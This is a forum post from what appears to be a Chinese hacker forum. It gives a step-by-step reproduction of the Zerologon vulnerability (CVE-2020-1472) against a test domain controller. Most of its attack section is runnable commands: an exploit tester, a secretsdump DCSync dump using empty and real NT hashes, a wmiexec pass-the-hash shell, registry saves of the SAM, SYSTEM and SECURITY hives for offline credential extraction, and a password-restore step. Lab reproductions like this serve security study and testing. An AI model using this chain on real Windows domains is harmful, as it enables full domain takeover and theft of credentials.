• Welcome to the world's largest Chinese hacker forum

    Welcome to the world's largest Chinese hacker forum, our forum registration is open! You can now register for technical communication with us, this is a free and open to the world of the BBS, we founded the purpose for the study of network security, please don't release business of black/grey, or on the BBS posts, to seek help hacker if violations, we will permanently frozen your IP and account, thank you for your cooperation. Hacker attack and defense cracking or network Security

    business please click here: Creation Security  From CNHACKTEAM

CVE-2020-1472 复现操作


This Wind

Recommended Posts

漏洞介绍

当攻击者使用Netlogon远程协议(MS-NRPC)建立与域控制器的易受攻击的Netlogon安全通道连接时,将存在特权提升漏洞。成功利用此漏洞的攻击者可以在网络上的设备上运行特制的应用程序。
要利用此漏洞,将需要未经身份验证的攻击者使用MS-NRPC连接到域控制器以获得域管理员访问权限。

 

影响范围

Windows Server 2008 R2(用于基于x64的系统)Service Pack 1
Windows Server 2008 R2(用于基于x64的系统)Service Pack 1(服务器核心安装)
Windows Server 2012
Windows Server 2012(服务器核心安装)
Windows Server 2016
Windows Server 2016(服务器核心安装)
Windows Server 2019
Windows Server 2019(服务器核心安装)
Windows Server 1903版(服务器核心安装)
Windows Server版本1909(服务器核心安装)
Windows Server 2004版(服务器核心安装)

缓解措施:暂无

漏洞复现过程

测试环境:windows server 2008和windows server 2012
测试结果:Windows server 2012失败(作者的windows server 2012 sp2可以成功)

dcip:192.168.1.111(由于某些原因我改了一下ip后面到了192.168.1.107)
domain:demo.com

使用给出的exp地址:https://github.com/SecuraBV/CVE-2020-1472

python zerologon_tester.py <dcname> <dcip>
python zerologon_tester.py testing 192.168.1.111

 

wcnquF.png

使用scretsdump.py指定空hash或者-no-pass进行dcsync dump (我这里的no-pass并没有成功,不知道是不是这个exp的问题还是什么原因)

python secretsdump.py demo.com/'TESTING -hashes aad3b435b51404eeaad3b435b51404ee:d42e7df83d64ed8c8e5630ce63cdeee0@192.168.1.107 -hashes aad3b435b51404eeaad3b435b51404ee:d42e7df83d64ed8c8e5630ce63cdeee0

 

wcuugf.png

 

wcnx41.png

然后使用wmicexec连接到dc

wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:5f7fc88c760df9ce3d74657a5943e42e demo.com/administrator@192.168.1.107

 

wcu9gK.png

保存sam文件下载到本地

reg save hklm\sam c:\sam.hive
reg save hklm\system c:\system.hive
reg save hklm\security c:\security.hive

 

wcuiuD.md.png

secretsdump解析sam(这里的MACHINE.ACC的hash是原来机器账户的hash)

python3 secretsdump.py -system system.hive -system system.hive -security security.hive LOCAL

wcuZ4I.png

然后使用poc给出的restorepassword.py恢复hash(这里需要新版impacket我这里没有成,借一下文章的图)

python3 reinstall_original_pw.py testing 192.168.1.107 52bc2ea24e84d8faf163364510dd3b07b36c9c85a5846614328ccd3ff83e5ff825e3e0ae11759f1393ba10b572a480ee78272a341a2abb8b4ef65f1b754045d577543d70eac45b471d688e91dc4306a5bf0021d4d0dedaabdc866aeb260232fe85bc2319a47665e6a7cf10751e16a064ef79486d6fc86abeac64d86f5c91d8b5ba787194c082c16da99bbeca73ab323de5cc8a86ddd25d8f5e842c4ab8d4f8b304d920e9d2b3ffe43ff955173eb2451c915b712115d791560eb532cc4b30d093497a96b2941d2fbc8bc9a00fafb0a1b9b6bf466171937ee1f5e8c93fd17392ac897491b708ee934583c89d65ef6a97d1
  •  
wculDg.png
wcu8Ej.png

参考链接:
https://mp.weixin.qq.com/s?__biz=MzI2ODQwNTkxNw==&mid=2247483702&idx=1&sn=263cb1377e79f3d6e11b57b96f5e3755

 

Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now